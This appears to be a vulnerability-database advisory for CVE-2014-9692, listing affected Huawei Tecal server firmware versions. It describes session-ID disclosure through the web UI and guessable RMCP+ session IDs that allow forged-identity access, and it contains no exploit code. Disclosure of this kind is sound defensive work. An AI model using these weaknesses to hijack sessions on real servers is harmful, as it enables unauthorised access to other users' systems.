Huawei Tecal RH1288 V2 V100R002C00SPC107 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285 V2 V100R002C00SPC115 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285H V2 V100R002C00SPC111 and earlier versions, Tecal RH2268 V2 V100R002C00, Tecal RH2288 V2 V100R002C00SPC117 and earlier versions, Tecal RH2288H V2 V100R002C00SPC115 and earlier versions, Tecal RH2485 V2 V100R002C00SPC502 and earlier versions, Tecal RH5885 V2 V100R001C02SPC109 and earlier versions, Tecal RH5885 V3 V100R003C01SPC102 and earlier versions, Tecal RH5885H V3 V100R003C00SPC102 and earlier versions, Tecal XH310 V2 V100R001C00SPC110 and earlier versions, Tecal XH311 V2 V100R001C00SPC110 and earlier versions, Tecal XH320 V2 V100R001C00SPC110 and earlier versions, Tecal XH621 V2 V100R001C00SPC106 and earlier versions, Tecal DH310 V2 V100R001C00SPC110 and earlier versions, Tecal DH320 V2 V100R001C00SPC106 and earlier versions, Tecal DH620 V2 V100R001C00SPC106 and earlier versions, Tecal DH621 V2 V100R001C00SPC107 and earlier versions, Tecal DH628 V2 V100R001C00SPC107 and earlier versions, Tecal BH620 V2 V100R002C00SPC107 and earlier versions, Tecal BH621 V2 V100R002C00SPC106 and earlier versions, Tecal BH622 V2 V100R002C00SPC110 and earlier versions, Tecal BH640 V2 V100R002C00SPC108 and earlier versions, Tecal CH121 V100R001C00SPC180 and earlier versions, Tecal CH140 V100R001C00SPC110 and earlier versions, Tecal CH220 V100R001C00SPC180 and earlier versions, Tecal CH221 V100R001C00SPC180 and earlier versions, Tecal CH222 V100R002C00SPC180 and earlier versions, Tecal CH240 V100R001C00SPC180 and earlier versions, Tecal CH242 V100R001C00SPC180 and earlier versions, Tecal CH242 V3 V100R001C00SPC110 and earlier versions could allow users who log in to the products to view the sessions IDs of all online users on the Online Users page of the web UI. Multiple Huawei Tecal products contain an information disclosure vulnerability; information may be obtained. The Huawei Tecal RH1288 V2 and the other listed models are servers from China's Huawei. An attacker could use this vulnerability to view the session IDs of all online users on the web UI's Online Users page
VAR-201704-0471 CVE-2014-9692 Multiple Huawei Tecal products: information disclosure vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Huawei Tecal RH1288 V2 V100R002C00SPC107 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285 V2 V100R002C00SPC115 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285H V2 V100R002C00SPC111 and earlier versions, Tecal RH2268 V2 V100R002C00, Tecal RH2288 V2 V100R002C00SPC117 and earlier versions, Tecal RH2288H V2 V100R002C00SPC115 and earlier versions, Tecal RH2485 V2 V100R002C00SPC502 and earlier versions, Tecal RH5885 V2 V100R001C02SPC109 and earlier versions, Tecal RH5885 V3 V100R003C01SPC102 and earlier versions, Tecal RH5885H V3 V100R003C00SPC102 and earlier versions, Tecal XH310 V2 V100R001C00SPC110 and earlier versions, Tecal XH311 V2 V100R001C00SPC110 and earlier versions, Tecal XH320 V2 V100R001C00SPC110 and earlier versions, Tecal XH621 V2 V100R001C00SPC106 and earlier versions, Tecal DH310 V2 V100R001C00SPC110 and earlier versions, Tecal DH320 V2 V100R001C00SPC106 and earlier versions, Tecal DH620 V2 V100R001C00SPC106 and earlier versions, Tecal DH621 V2 V100R001C00SPC107 and earlier versions, Tecal DH628 V2 V100R001C00SPC107 and earlier versions, Tecal BH620 V2 V100R002C00SPC107 and earlier versions, Tecal BH621 V2 V100R002C00SPC106 and earlier versions, Tecal BH622 V2 V100R002C00SPC110 and earlier versions, Tecal BH640 V2 V100R002C00SPC108 and earlier versions, Tecal CH121 V100R001C00SPC180 and earlier versions, Tecal CH140 V100R001C00SPC110 and earlier versions, Tecal CH220 V100R001C00SPC180 and earlier versions, Tecal CH221 V100R001C00SPC180 and earlier versions, Tecal CH222 V100R002C00SPC180 and earlier versions, Tecal CH240 V100R001C00SPC180 and earlier versions, Tecal CH242 V100R001C00SPC180 and earlier versions, Tecal CH242 V3 V100R001C00SPC110 and earlier versions could allow attackers to figure out the RMCP+ session IDs of users and access the system with forged identities. Multiple Huawei Tecal products contain an information disclosure vulnerability; information may be obtained. The Huawei Tecal RH1288 V2 and the other listed models are servers from China's Huawei. Security vulnerabilities exist in various Huawei servers. An attacker could exploit the vulnerability to gain access to the system by guessing the session IDs used by other users